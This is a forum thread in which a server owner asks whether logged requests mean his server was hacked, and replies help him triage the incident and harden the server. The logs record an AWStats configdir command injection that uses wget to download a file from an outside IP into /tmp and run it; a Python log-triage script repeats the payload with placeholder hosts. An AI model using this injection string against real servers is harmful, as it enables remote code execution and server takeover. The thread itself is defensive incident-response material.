Hacked? Or Not?
68.248.81.236 - - [18/Feb/2006:18:07:46 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.248.81.236 - - [18/Feb/2006:18:07:48 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 200 760 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.248.81.236 - - [18/Feb/2006:18:07:50 +1100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
I'm fairly certain this is an attempted hack. The 404 errors lead me to believe it was unsuccessful, but there is a 200 error as well?
Any Ideas?
Cheers.
7 Replies
To see for sure if it worked, look in your /tmp directory. If you see a file named gicule, then the exploit worked. There'll also be a process running named gicule. Kill it immediately.
The company that hosts that file seems to have taken action against the person hosting it, since the file it downloads is now not accessible. This is good, but if you have the file it means I can't tell you what it does. Therefore it's probably best to assume the worst until proven otherwise. Typically these scripts run shells that people can use to perhaps root your box.
Keep us posted.
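As an added example (not from the thread), the triage the reply above describes, applied to log lines shaped like the ones in the question: a small Python script that decodes the configdir payload, separates the 200 from awstats.pl (the script existed and ran) from the 404 probes (nothing ran), and pulls out the basename of the fetched file so you know what to look for in /tmp and in the process list. The addresses, download host and file name in the sample are constructed placeholders, not the ones from the question.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "METHOD url PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) ')
WGET_RE = re.compile(r'\bwget\s+([^\s;|&]+)')  # fetched URL; stop at shell separators

# Constructed sample (placeholder addresses, host and file name) shaped like the
# question's lines: a 404 probe, a 200 hit on the real path, then a normal request.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Feb/2006:18:07:46 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e9%2fdropper%3bchmod%20%2bx%20dropper%3b%2e%2fdropper;echo%20YYY;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0"
198.51.100.7 - - [18/Feb/2006:18:07:48 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e9%2fdropper%3bchmod%20%2bx%20dropper%3b%2e%2fdropper;echo%20YYY;echo| HTTP/1.1" 200 760 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Feb/2006:19:00:00 +1100] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 200 1200 "-" "Mozilla/4.0"
"""

def parse_line(line):
    # Split one access-log line into fields and decode its query parameters.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, query = rec["url"].partition("?")
    rec["params"] = {}
    # Split on '&' only: the payload uses ';' as a shell separator (parse_qs split on it before 3.10).
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            rec["params"][key] = unquote(value)
    return rec

def triage(rec):
    # Return a finding if the record is an AWStats configdir injection, else None.
    if rec is None or not rec["path"].endswith("awstats.pl"):
        return None
    cmd = rec["params"].get("configdir", "")
    if "|" not in cmd:  # a legitimate configdir is a plain directory name
        return None
    m = WGET_RE.search(cmd)
    return {
        "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "status": rec["status"],
        "command": cmd,
        # basename of the fetched file: what to look for in /tmp and in ps output
        "dropped_file": m.group(1).rsplit("/", 1)[-1] if m else None,
        # 200: awstats.pl existed and ran, so the payload may have executed; 404: nothing ran
        "executed_candidate": rec["status"] == 200,
    }

def triage_log(text):
    # Run triage over every line; return only the findings, in log order.
    return [f for f in (triage(parse_line(l)) for l in text.splitlines()) if f]
```

A 200 only says awstats.pl handled the request; whether the command actually ran depends on the AWStats version, so the dropped_file value is the thing to check for on disk and in the process list.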
I'm thinking that the exploit was unsuccessful, and I hope so. I just got my server working the way I want; I've spent quite some time learning it, but I actually need to start using it very soon, so I am concerned.
Is there any other way of knowing if this was successful?
Cheers.
Technically, it's possible that the script might delete itself after use or that anybody using the shell might delete the file afterwards. Few are intelligent enough to do this, though. I would take Beek's advice and check your firewall logs if you have them and they log connections. If they don't, then I'm not sure that there's a definitive way to tell if you've been compromised or not.
I would probably assume you're okay. But for next time, password-protect AWStats if possible, or move it into another directory. Same for other obviously-named scripts. Either will protect you from that sort of thing again.
Oh well better get compiling so I can have as little downtime as possible.
Cheers guys.
If so, I'd use your main Apache config or an .htaccess file to limit access to that dir by IP address. I believe something like this will work:
Order Deny,Allow
Deny from all
Allow from 128.101.101.101
where 128.101.101.101 is the IP you want to access it from. If you get a new IP on your connection at home, you'll have to change that. Not a big deal considering it renders all attacks like this useless.
I removed AWStats since it's an unnecessary risk for the small service it provides, but if you need statistics, you can apply access control like the previous poster suggested. Try this:
<Location /cgi-bin/awstats.pl>
Order Deny,Allow
Deny from all
Allow from 1.2.3.4
</Location>
to allow by IP address, or use password authentication, like this:
<Location /cgi-bin/awstats.pl>
AuthType Basic
AuthName "AWStats"
AuthUserFile /path/to/passwd_file
Require valid-user
</Location>
You can use "htpasswd -c /path/to/passwd_file username" to set the password.
You dodged a bullet this time, but you should do something because AWStats will likely have more exploits in the future, and you don't want to turn your LVS into a spambot!